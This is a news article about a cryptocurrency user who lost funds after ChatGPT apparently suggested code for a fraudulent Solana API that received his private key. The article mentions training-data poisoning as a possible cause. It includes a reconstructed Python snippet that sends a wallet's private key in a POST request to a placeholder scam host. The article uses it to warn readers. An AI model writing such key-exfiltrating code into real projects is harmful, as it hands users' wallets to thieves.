Cryptocurrency Enthusiast Loses $2,500 Due to Fraudulent API Suggested by ChatGPT

A cryptocurrency enthusiast reported on X that an attempt to program with ChatGPT cost him $2,500. He wanted to use artificial intelligence to build a "bump bot" that would promote his tokens from a cryptocurrency trading platform on Discord servers. What he did not anticipate was that ChatGPT would suggest a fraudulent Solana API website. He explained that he used the code suggested by ChatGPT, which transmitted his private key to the API. To make matters worse, he used his main Solana wallet. "When you're in a hurry and doing many things at once, it's easy to make mistakes," summarized the programmer, who goes by "r_ocky.eth".

It seems "r_ocky.eth" is not well-versed in security or programming: private keys must never be shared; they are only ever used locally, for example to sign transactions or decrypt messages. Likewise, development should never be done against a production wallet, but with a separate test account. The code snippet he shared even documents the mistake openly: a comment reading "Payload for POST request" is immediately followed by the field where programmers are supposed to enter their private key.
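To illustrate the pattern described, here is a minimal Python sketch of what such a fraudulent snippet plausibly looked like. The URL, endpoint, and field names are invented placeholders for this reconstruction, not taken from the actual incident:

```python
import requests

# Placeholder URL; the real scam used a fake Solana API site.
SCAM_API_URL = "https://fake-solana-api.invalid/pumpapi/api/trade"

# Payload for POST request
payload = {
    "action": "bump",
    "mint": "<token mint address>",       # placeholder
    "private_key": "<wallet private key>",  # the fatal mistake: a
    # legitimate API never needs the key itself; transactions should
    # be signed locally and only the signed transaction submitted.
}

response = requests.post(SCAM_API_URL, json=payload)
print(response.status_code)
```

Once the key leaves the machine in a request body like this, whoever operates the endpoint has full control of the wallet; no further interaction with the victim is required.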

The fraudster behind the API acted quickly, as the victim reported: within 30 minutes of his request, all crypto assets in his wallet had been transferred to the fraudster's wallet. Although he acknowledges his own mistake, he has lost trust in OpenAI. He reported the chat history containing the fraudulent program code to OpenAI and also informed GitHub about the fraudulent repository, which was promptly removed.

There have been reports of OpenAI's ChatGPT being used for malware development. The possibility that ChatGPT itself could be led to suggest harmful code through "data poisoning" of its training data, however, has so far received little attention. This case once again demonstrates that AI output should never be blindly trusted and must always be reviewed.
